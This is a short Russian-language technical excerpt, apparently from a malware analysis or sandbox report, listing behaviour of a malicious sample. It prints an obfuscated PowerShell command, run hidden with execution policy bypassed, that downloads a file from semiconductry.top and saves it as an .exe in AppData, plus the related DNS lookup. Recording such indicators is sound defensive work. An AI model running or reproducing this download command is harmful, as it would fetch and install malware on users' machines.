Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWeRShell.exE -EXecuTiONPoLiCy bYPasS -nopROFILE -winDOWsTYlE HIdDEn (NEW-obJeCT systeM.net.WeBcLIENt).DownLOaDfILE('http://semiconductry.top/search.php','%aPpdata%.exe...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /C "POWeRShell.exE -EXecuTiONPoLiCy bYPasS -nopROFILE -winDOWsTYlE HIdDEn (NEW-obJeCT systeM.net.WeBcLIENt).DownLOaDfILE('http://semiconductry.top/search.php','%aPpdata%.exe...' (со скрытым окном)